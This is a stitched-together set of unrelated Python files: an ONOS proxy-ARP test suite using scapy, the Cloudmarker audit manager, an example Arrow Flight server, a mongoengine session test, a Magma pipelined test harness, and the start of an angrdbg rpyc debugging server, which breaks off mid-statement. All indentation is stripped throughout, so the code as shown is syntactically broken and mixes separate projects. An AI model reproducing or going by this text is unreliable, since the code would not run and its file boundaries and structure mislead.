assert_equal(status, True)
@classmethod
def generate_interface_config(cls, hosts = 1):
num = 0
start_host = ( 192 << 24) | ( 168 << 16) | (10 << 8) | 0
end_host = ( 200 << 24 ) | (168 << 16) | (10 << 8) | 0
ports_dict = { 'ports' : {} }
interface_list = []
hosts_list = []
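# One host is generated per /24 starting at 192.168.10.0: the interface on
# each port gets the .1 address (e.g. 192.168.10.1/24) and the simulated
# host the .2 address (e.g. 192.168.10.2), stepping through successive /24s.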
for n in xrange(start_host, end_host, 256):
port_map = ports_dict['ports']
port = num + 1 if num < cls.MAX_PORTS - 1 else cls.MAX_PORTS - 1
device_port_key = '{0}/{1}'.format(cls.device_id, port)
try:
interfaces = port_map[device_port_key]['interfaces']
except:
port_map[device_port_key] = { 'interfaces' : [] }
interfaces = port_map[device_port_key]['interfaces']
ip = n + 1
host_ip = n + 2
ips = '%d.%d.%d.%d/24'%( (ip >> 24) & 0xff, ( (ip >> 16) & 0xff ), ( (ip >> 8 ) & 0xff ), ip & 0xff)
host = '%d.%d.%d.%d' % ( (host_ip >> 24) & 0xff, ( ( host_ip >> 16) & 0xff ), ( (host_ip >> 8 ) & 0xff ), host_ip & 0xff )
mac = RandMAC()._fix()
hosts_list.append((host, mac))
if num < cls.MAX_PORTS - 1:
interface_dict = { 'name' : 'b1-{}'.format(port), 'ips': [ips], 'mac' : mac }
interfaces.append(interface_dict)
interface_list.append(interface_dict['name'])
else:
interfaces[0]['ips'].append(ips)
num += 1
if num == hosts:
break
cls.hosts_list = hosts_list
return (cls.device_dict, ports_dict, hosts_list)
@classmethod
def generate_host_config(cls):
num = 0
hosts_dict = {}
for host, mac in cls.hosts_list:
port = num + 1 if num < cls.MAX_PORTS - 1 else cls.MAX_PORTS - 1
hosts_dict[host] = {'mac':mac, 'vlan':'none', 'ipAddresses':[host], 'location':{ 'elementId' : '{}'.format(cls.device_id), 'port': port}}
num += 1
return hosts_dict.values()
@classmethod
def proxyarp_activate(cls, deactivate = False):
app = 'org.onosproject.proxyarp'
onos_ctrl = OnosCtrl(app)
if deactivate is True:
onos_ctrl.deactivate()
else:
onos_ctrl.activate()
time.sleep(3)
@classmethod
def proxyarp_config(cls, hosts = 1):
proxyarp_configs = cls.generate_interface_config(hosts = hosts)
cls.interface_config_load(interface_cfg = proxyarp_configs)
hostcfg = cls.generate_host_config()
cls.host_config_load(host_config = hostcfg)
return proxyarp_configs
def proxyarp_arpreply_verify(self, ingress, hostip, hostmac, PositiveTest=True):
log_test.info('verifying arp reply for host ip %s host mac %s on interface %s'%(hostip ,hostmac ,self.port_map[ingress]))
self.success = False
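# A sniffer thread waits for an ARP reply (op=2) whose source MAC matches
# hostmac, while a broadcast who-has for hostip is sent on the same
# interface; self.success is only set if the reply arrives before the
# sniff timeout.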
def recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
self.success = True if PositiveTest == True else False
sniff(count=1, timeout=2, lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst=hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip, self.port_map[ingress]))
sendp( pkt, count = 10, iface = self.port_map[ingress])
t.join()
if PositiveTest:
assert_equal(self.success, True)
else:
assert_equal(self.success, False)
def __proxyarp_hosts_verify(self, hosts = 1,PositiveTest = True):
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
log_test.info('\nhosts_config %s and its type %s'%(hosts_config,type(hosts_config)))
self.cliEnter()
connected_hosts = json.loads(self.cli.hosts(jsonFormat = True))
log_test.info('Discovered hosts: %s' %connected_hosts)
# We only verify the host count via the cli when a small number is expected, to avoid cli timeouts
if hosts <= 10000:
assert_equal(len(connected_hosts), hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = PositiveTest)
time.sleep(1)
self.cliExit()
return True
def test_proxyarp_with_1_host(self, hosts=1):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
#cls.proxyarp_host_unload()
def test_proxyarp_with_10_hosts(self, hosts=10):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
def test_proxyarp_with_50_hosts(self, hosts=50):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
def test_proxyarp_app_with_disabling_and_re_enabling(self,hosts = 3):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('Deactivating proxyarp app and expecting not to get arp reply from ONOS')
self.proxyarp_activate(deactivate = True)
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = False)
time.sleep(1)
log_test.info('activating proxyarp app and expecting to get arp reply from ONOS')
self.proxyarp_activate(deactivate = False)
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
def test_proxyarp_nonexisting_host(self,hosts = 1):
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts + 2
for host, mac in hosts_config:
self.proxyarp_arpreply_verify(ingress,host,mac,PositiveTest = True)
new_host = hosts_config[-1][0].split('.')
new_host[2] = str(int(new_host[2])+1)
new_host = '.'.join(new_host)
new_mac = RandMAC()._fix()
log_test.info('verifying arp reply for host ip %s on interface %s'%(new_host,self.port_map[ingress]))
res=srp1(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst=new_host),timeout=2,iface=self.port_map[ingress])
assert_equal(res, None)
log_test.info('arp reply not seen for host ip %s on interface %s as expected'%(new_host,self.port_map[ingress]))
hosts = hosts + 1
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
for host in hosts_config:
if host[0] == new_host:
new_mac = host[1]
self.proxyarp_arpreply_verify(ingress,new_host,new_mac,PositiveTest = True)
def test_proxyarp_removing_host(self,hosts = 3):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
host_mac = hosts_config[0][1]
log_test.info('removing host entry %s' % host_mac)
self.cliEnter()
hostentries = json.loads(self.cli.hosts(jsonFormat = True))
for host in hostentries:
res = host_mac.upper() in host.values()
if res:
break
assert_equal(res, True)
hostid = host_mac+'/'+'None'
delete_host = self.cli.host_remove(hostid)
hostentries = json.loads(self.cli.hosts(jsonFormat = True))
for host in hostentries:
res = host_mac.upper() in host.values()
if res:
break
assert_equal(res, False)
self.proxyarp_arpreply_verify(ingress,hosts_config[0][0],host_mac,PositiveTest = False)
time.sleep(1)
self.cliExit()
def test_proxyarp_concurrent_requests_with_multiple_host_and_different_interfaces(self,hosts = 10):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
for i in range(10):
t[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
def test_proxyarp_disabling_enabling_app_initiating_concurrent_requests(self,hosts = 10):
'''Test sending arp requests to multiple host ips at once from different interfaces by disabling and re-enabling proxyarp app'''
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t1 = []
#starting multi threading before proxyarp disable
for i in range(10):
t1.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t1[i].start()
for i in range(10):
t1[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
self.proxyarp_activate(deactivate = True)
#starting multi threading after proxyarp disable
t2 = []
self.success = False
for i in range(10):
t2.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t2[i].start()
for i in range(10):
t2[i].join()
if len(success_dir) != 10:
self.success = True
assert_equal(self.success, False)
self.proxyarp_activate(deactivate = False)
#starting multi threading after proxyarp re-enable
self.success = True
t3 = []
for i in range(10):
t3.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t3[i].start()
for i in range(10):
t3[i].join()
if len(success_dir) != 20:
self.success = False
assert_equal(self.success, True)
def test_proxyarp_with_existing_and_non_existing_hostIPs_initiating_concurrent_requests(self,hosts = 5):
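        '''Test sending concurrent arp requests for existing and non-existing host ips, verifying that only existing hosts get replies'''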
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
#adding 5 non-existing host IPs to hostip list
for i in range(1,6):
ip = hostip[-1].split('.')
ip[3] = str(int(ip[3])+int(i))
ip = '.'.join(ip)
hostip.append(ip)
hostmac.append(RandMAC()._fix())
success_dir = {}
replied_hosts = []
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
replied_hosts.append(hostip)
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].psrc == hostip,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
for i in range(10):
t[i].join()
if len(success_dir) != 5 and len(replied_hosts) != 5:
self.success = False
assert_equal(self.success, True)
for i in range(5):
if hostip[i] not in replied_hosts:
self.success = False
assert_equal(self.success, True)
|
manager.py
|
#!/usr/bin/env python
"""Manager of worker subprocesses.
This module invokes the worker subprocesses that perform the cloud
security monitoring tasks. Each worker subprocess wraps around a cloud,
store, event, or alert plugin and executes the plugin in a separate
subprocess.
"""
import copy
import logging.config
import multiprocessing as mp
import textwrap
import time
import schedule
import cloudmarker
from cloudmarker import baseconfig, util, workers
# Define module-level logger.
_log = logging.getLogger(__name__)
def main():
"""Run the framework based on the schedule."""
# Configure the logger as the first thing as per the base
# configuration. We need this to be the first thing, so that
# we can see the messages logged by util.load_config().
log_config = copy.deepcopy(baseconfig.config_dict['logger'])
log_config['handlers'] = {'console': log_config['handlers']['console']}
log_config['root']['handlers'] = ['console']
logging.config.dictConfig(log_config)
_log.info('Cloudmarker %s', cloudmarker.__version__)
# Parse the command line arguments and handle the options that can
# be handled immediately.
args = util.parse_cli()
if args.print_base_config:
print(baseconfig.config_yaml.strip())
return
# Now load user's configuration files.
config = util.load_config(args.config)
# Then configure the logger once again to honour any logger
# configuration defined in the user's configuration files.
logging.config.dictConfig(config['logger'])
_log.info('Cloudmarker %s; configured', cloudmarker.__version__)
# Finally, run the audits, either right now or as per a schedule,
# depending on the command line options.
if args.now:
_log.info('Starting job now')
_run(config)
else:
_log.info('Scheduled to run job everyday at %s', config['schedule'])
schedule.every().day.at(config['schedule']).do(_run, config)
while True:
schedule.run_pending()
time.sleep(60)
def _run(config):
"""Run the audits.
Arguments:
config (dict): Configuration dictionary.
"""
start_time = time.localtime()
_send_email(config.get('email'), 'all audits', start_time)
# Create an audit object for each audit configured to be run.
audit_version = time.strftime('%Y%m%d_%H%M%S', time.gmtime())
audits = []
for audit_key in config['run']:
audits.append(Audit(audit_key, audit_version, config))
# Start all audits.
for audit in audits:
audit.start()
# Wait for all audits to terminate.
for audit in audits:
audit.join()
end_time = time.localtime()
_send_email(config.get('email'), 'all audits', start_time, end_time)
class Audit:
"""Audit manager.
This class encapsulates a set of worker subprocesses and worker
input queues for a single audit configuration.
"""
def __init__(self, audit_key, audit_version, config):
"""Create an instance of :class:`Audit` from configuration.
A single audit definition (from a list of audit definitions
under the ``audits`` key in the configuration) is instantiated.
Each audit definition contains lists of cloud plugins, store
plugins, event plugins, and alert plugins. These plugins are
instantiated and multiprocessing queues are set up to take
records from one plugin and feed them to another plugin as per
the audit workflow.
Arguments:
audit_key (str): Key name for an audit configuration. This
key is looked for in ``config['audits']``.
audit_version (str): Audit version string.
config (dict): Configuration dictionary. This is the
entire configuration dictionary that contains
top-level keys named ``clouds``, ``stores``, ``events``,
``alerts``, ``audits``, ``run``, etc.
"""
self._start_time = time.localtime()
self._audit_key = audit_key
self._audit_version = audit_version
self._config = config
audit_config = config['audits'][audit_key]
# We keep all workers in these lists.
self._cloud_workers = []
self._store_workers = []
self._event_workers = []
self._alert_workers = []
# We keep all queues in these lists.
self._store_queues = []
self._event_queues = []
self._alert_queues = []
# Create alert workers and queues.
for plugin_key in audit_config.get('alerts', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
)
worker = mp.Process(target=workers.alert_worker, args=args)
self._alert_workers.append(worker)
self._alert_queues.append(input_queue)
        # Create event workers and queues.
for plugin_key in audit_config.get('events', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
self._alert_queues,
)
worker = mp.Process(target=workers.event_worker, args=args)
self._event_workers.append(worker)
self._event_queues.append(input_queue)
# Create store workers and queues.
for plugin_key in audit_config.get('stores', []):
input_queue = mp.Queue()
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
input_queue,
)
worker = mp.Process(target=workers.store_worker, args=args)
self._store_workers.append(worker)
self._store_queues.append(input_queue)
# Create cloud workers.
for plugin_key in audit_config.get('clouds', []):
args = (
audit_key,
audit_version,
plugin_key,
util.load_plugin(config['plugins'][plugin_key]),
self._store_queues + self._event_queues
)
worker = mp.Process(target=workers.cloud_worker, args=args)
self._cloud_workers.append(worker)
def start(self):
"""Start audit by starting all workers."""
_send_email(self._config.get('email'), self._audit_key,
self._start_time)
begin_record = {'com': {'record_type': 'begin_audit'}}
# Start store and alert workers first before cloud and event
# workers. See next comment to know why.
for w in self._store_workers + self._alert_workers:
w.start()
# We want to send begin_audit record to store/alert plugins
# before any cloud/event workers can send their records to them.
for q in self._store_queues + self._alert_queues:
q.put(begin_record)
# Now start the cloud and event workers.
for w in self._cloud_workers + self._event_workers:
w.start()
def join(self):
"""Wait until all workers terminate."""
# Wait for cloud workers to terminate.
for w in self._cloud_workers:
w.join()
end_record = {'com': {'record_type': 'end_audit'}}
# Stop store workers.
for q in self._store_queues:
q.put(end_record)
q.put(None)
# Stop event workers.
for q in self._event_queues:
q.put(None)
# Wait for store workers to terminate.
for w in self._store_workers:
w.join()
# Wait for event workers to terminate.
for w in self._event_workers:
w.join()
# Stop alert workers.
for q in self._alert_queues:
q.put(end_record)
q.put(None)
# Wait for alert workers to terminate.
for w in self._alert_workers:
w.join()
end_time = time.localtime()
_send_email(self._config.get('email'), self._audit_key,
self._start_time, end_time)
def _send_email(email_config, about, start_time, end_time=None):
"""Send email about job or audit that is starting or ending.
Arguments:
email_config (dict): Top-level email configuration dictionary.
about (str): A short string that says what the email
notification is about, e.g., ``'job'`` or ``'audit'``.
start_time (time.struct_time): Start time of job or audit.
end_time (time.struct_time): End time of job or audit. This
argument must not be specified if the job or audit is
starting.
"""
state = 'starting' if end_time is None else 'ending'
if email_config is None:
_log.info('Skipping email notification because email config is '
'missing; about: %s; state: %s', about, state)
return
_log.info('Sending email; about: %s; state: %s', about, state)
# This part of the content is common for both starting and
# ending states.
time_fmt = '%Y-%m-%d %H:%M:%S %z (%Z)'
content = """
About: {}
Started: {}
""".format(about, time.strftime(time_fmt, start_time))
content = textwrap.dedent(content).lstrip()
# This part of the content is added only for ending state.
if state == 'ending':
duration = time.mktime(end_time) - time.mktime(start_time)
mm, ss = divmod(duration, 60)
hh, mm = divmod(mm, 60)
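        # e.g. a duration of 3725 seconds becomes hh=1, mm=2, ss=5 and is
        # rendered as "01 h 02 m 05 s" below.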
end_content = """
Ended: {}
Duration: {:02.0f} h {:02.0f} m {:02.0f} s
""".format(time.strftime(time_fmt, end_time), hh, mm, ss)
content = content + textwrap.dedent(end_content).lstrip()
util.send_email(content=content, **email_config)
_log.info('Sent email; about: %s; state: %s', about, state)
|
server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""An example Flight Python server."""
import ast
import threading
import time
import pyarrow
import pyarrow.flight
class FlightServer(pyarrow.flight.FlightServerBase):
def __init__(self):
super(FlightServer, self).__init__()
self.flights = {}
@classmethod
    def descriptor_to_key(cls, descriptor):
return (descriptor.descriptor_type.value, descriptor.command,
tuple(descriptor.path or tuple()))
def list_flights(self, criteria):
for key, table in self.flights.items():
if key[1] is not None:
descriptor = \
pyarrow.flight.FlightDescriptor.for_command(key[1])
else:
descriptor = pyarrow.flight.FlightDescriptor.for_path(*key[2])
endpoints = [
pyarrow.flight.FlightEndpoint(repr(key),
[('localhost', 5005)]),
]
yield pyarrow.flight.FlightInfo(table.schema,
descriptor, endpoints,
table.num_rows, 0)
def get_flight_info(self, descriptor):
key = FlightServer.descriptor_to_key(descriptor)
if key in self.flights:
table = self.flights[key]
endpoints = [
pyarrow.flight.FlightEndpoint(repr(key),
[('localhost', 5005)]),
]
return pyarrow.flight.FlightInfo(table.schema,
descriptor, endpoints,
table.num_rows, 0)
raise KeyError('Flight not found.')
def do_put(self, descriptor, reader):
key = FlightServer.descriptor_to_key(descriptor)
print(key)
self.flights[key] = reader.read_all()
print(self.flights[key])
def do_get(self, ticket):
key = ast.literal_eval(ticket.ticket.decode())
if key not in self.flights:
return None
return pyarrow.flight.RecordBatchStream(self.flights[key])
def list_actions(self):
return [
("clear", "Clear the stored flights."),
("shutdown", "Shut down this server."),
]
    def do_action(self, action):
        if action.type == "clear":
            raise NotImplementedError(
                "{} is not implemented.".format(action.type))
        elif action.type == "shutdown":
            yield pyarrow.flight.Result(pyarrow.py_buffer(b'Shutdown!'))
            # Shut down on background thread to avoid blocking current
            # request
            threading.Thread(target=self._shutdown).start()
        else:
            raise KeyError("Unknown action {!r}".format(action.type))
def _shutdown(self):
"""Shut down after a delay."""
print("Server is shutting down...")
time.sleep(2)
self.shutdown()
def main():
server = FlightServer()
server.run(5005)
if __name__ == '__main__':
main()
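'''simple client (a rough sketch; the exact client API depends on the pyarrow version)
import pyarrow
import pyarrow.flight

client = pyarrow.flight.connect("grpc://localhost:5005")
# upload a table under a path descriptor
table = pyarrow.table({"a": [1, 2, 3]})
descriptor = pyarrow.flight.FlightDescriptor.for_path("example")
writer, _ = client.do_put(descriptor, table.schema)
writer.write_table(table)
writer.close()
# fetch it back using the ticket advertised by get_flight_info
info = client.get_flight_info(descriptor)
reader = client.do_get(info.endpoints[0].ticket)
print(reader.read_all())
'''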
|
test_session.py
|
import threading
import unittest
from mongoengine import sessions
class SessionTest(unittest.TestCase):
def tearDown(self):
sessions.clear_all()
def test_set_get_local_session(self):
session = {"db": "1"}
sessions.set_local_session("test", session)
self.assertEqual(session, sessions.get_local_session("test"))
session2 = {"db": "2"}
sessions.set_local_session("test2", session2)
self.assertEqual(session2, sessions.get_local_session("test2"))
self.assertNotEqual(
sessions.get_local_session("test2"), sessions.get_local_session("test")
)
sessions.clear_local_session("test")
self.assertIsNone(sessions.get_local_session("test"))
sessions.clear_local_session("test2")
self.assertIsNone(sessions.get_local_session("test2"))
def test_set_get_local_session_multi_threads(self):
def new_session(i):
db_alias = "test"
session = {"db": i}
sessions.set_local_session(db_alias, session)
self.assertEqual(i, sessions.get_local_session(db_alias)["db"])
sessions.clear_local_session(db_alias)
threads = []
for i in range(10):
t = threading.Thread(target=new_session, args=(i,))
threads.append(t)
# Start them all
for thread in threads:
thread.start()
# Wait for all to complete
for thread in threads:
thread.join()
if __name__ == "__main__":
unittest.main()
|
start_pipelined.py
|
"""
Copyright (c) 2018-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import threading
import subprocess
from enum import Enum
from collections import namedtuple
from concurrent.futures import Future
from magma.pipelined.rule_mappers import RuleIDToNumMapper
from magma.pipelined.app.base import MagmaController
from magma.pipelined.tests.app.exceptions import ServiceRunningError,\
BadConfigError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout'
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement'
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats'
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing'
)
Meter = Controller(
'magma.pipelined.app.meter', 'meter'
)
MeterStats = Controller(
'magma.pipelined.app.meter_stats', 'meter_stats'
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control'
)
Subscriber = Controller(
'magma.pipelined.app.subscriber', 'subscriber'
)
def assert_pipelined_not_running():
"""
    Ryu applications shouldn't be started if the magma@pipelined service is
    running, so we need to verify that pipelined is not active. If the service
    is running, a ServiceRunningError exception is raised.
    This can be checked using the command:
        systemctl is-active magma@pipelined
    If the service is inactive, this returns error code 3 and the message
    "inactive".
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"]
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip())
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip()
)
def assert_valid_test_setup_config(test_setup):
"""
    Verify the TestSetup config. If the TestSetup is invalid, an exception is raised.
Checks that references are also present in apps
Checks that apps and references don't have duplicates
"""
for ref in test_setup.references:
if ref not in test_setup.apps:
raise BadConfigError("TestSetup reference %s not in apps" % ref)
if (len(test_setup.apps) != len(set(test_setup.apps))):
raise BadConfigError("TestSetup apps can't contain duplicates")
class StartThread(object):
"""
Starts ryu applications
    Uses ryu hub and ryu app_manager to launch ryu applications. Futures are
    used to get references to the instantiated apps, which allows unittests
    to call methods on pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
assert_valid_test_setup_config(test_setup)
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,))
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
If apps throw an exception on launch, error is passed in the
launch_successful_future and will prevent infinitely waiting.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = RuleIDToNumMapper()
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s')
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e))
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
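        # Usage sketch (names are illustrative): from test code running
        # outside the Ryu greenthread, call e.g.
        #   result = start_thread.run_in_greenthread(lambda: app.some_method())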
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
|
server.py
|
#!/usr/bin/env python
######################################################
# Author: Andrea Fioraldi <andreafioraldi@gmail.com> #
# License: BSD 2-Clause #
######################################################
"""
classic rpyc server running a SlaveService + angrdbg + IPython shell
usage:
angrdbg-srv.py # default settings
angrdbg-srv.py --host HOST --port PORT # custom settings
# ssl-authenticated server (keyfile and certfile are required)
angrdbg-srv.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
import threading
import signal
import Queue
from plumbum import cli
from rpyc.utils.server import Server
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService
BANNER = "[angrdbg server v1.0]"
#######################
import angr
import claripy
import pyvex
import angrdbg
import IPython
#from angrdbg import *
#######################
class WeirdServer(Server):  # first connection is handled in a thread, second in a forked child
def __init__(self, service, done_event, **kwargs):
self.num_conns = 2
self.thread = None
self.proc = None
self.done_event = done_event
Server.__init__(self, service, **kwargs)
@classmethod
def _handle_sigchld(cls, signum, unused):
try:
while True:
pid, dummy = os.waitpid(-1, os.WNOHANG)
if pid <= 0:
break
except OSError:
pass
# re-register signal handler (see man signal(2), under Portability)
signal.signal(signal.SIGCHLD, cls._handle_sigchld)
def _accept_method(self, sock):
self.num_conns -= 1
if self.num_conns == 1:
t = threading.Thread(
